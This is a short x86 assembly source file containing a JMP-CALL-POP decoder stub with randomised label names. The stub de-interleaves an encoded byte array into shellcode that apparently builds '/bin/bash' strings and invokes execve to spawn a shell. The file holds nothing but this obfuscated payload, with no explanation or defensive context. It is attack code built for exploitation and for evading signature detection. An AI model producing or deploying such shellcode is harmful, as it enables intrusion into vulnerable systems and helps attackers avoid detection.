section .text
global _start
_start:
	jmp short AuqDGbrpjVsDAGGLnEJiTph
IJXpQTkcDHE:
	pop esi
	xor ecx, ecx
	mov cl, 79
	lea edi, [esi]
	xor eax,eax
	xor ebx,ebx
	
BDDnprkyFFOYzlZmgH:
	mov bl, byte [edi + eax]
	mov byte [esi], bl
	add al, 2
	inc esi
	loop BDDnprkyFFOYzlZmgH
	jmp short dRzsPcHLpmMKDDC
AuqDGbrpjVsDAGGLnEJiTph:
	call IJXpQTkcDHE
	dRzsPcHLpmMKDDC: 		db	0x31,0x1a,0xc0,0xe0,0x50,0x1c,0x68,0xe8,0x62,0xc2,0x61,0xee,0x73,0x17,0x68,0x3e,0x68,0x29,0x62,0xab,0x69,0x8c,0x6e,0xcc,0x2f,0x7c,0x68,0x07,0x2f,0xda,0x2f,0xfc,0x2f,0x2a,0x2f,0xeb,0x89,0x29,0xe3,0x10,0x50,0x8f,0x68,0x0a,0x63,0x14,0x90,0x24,0x90,0xe4,0x90,0x44,0x68,0x2f,0x2d,0x4d,0x6e,0x3e,0x6f,0xab,0x72,0x4f,0x89,0x33,0x44,0x65,0x24,0xa9,0x05,0x3d,0x50,0xb8,0x68,0x5d,0x68,0x80,0x5d,0xc8,0x3a,0xe9,0x5a,0x8a,0x68,0x96,0x5b,0xa5,0x62,0xde,0x61,0xf6,0x73,0x68,0x68,0x9a,0x50,0x2a,0x53,0xfd,0x31,0xe7,0x3d,0x6f,0xc6,0x9e,0x44,0x3a,0x24,0x7f,0x0b,0xae,0x20,0xb8,0x50,0x7b,0x8d,0x1c,0x34,0x3b,0x24,0x8f,0x8d,0x1b,0x4e,0x44,0x14,0x9d,0x51,0x94,0x53,0x77,0x89,0xf5,0xe1,0x8e,0x50,0xca,0x8d,0x8e,0x56,0x3d,0x04,0x8c,0x52,0x61,0x8d,0xd0,0x14,0xcb,0x24,0x41,0xb0,0x2c,0x0b,0xdf,0xcd,0x57,0x80,0xc1
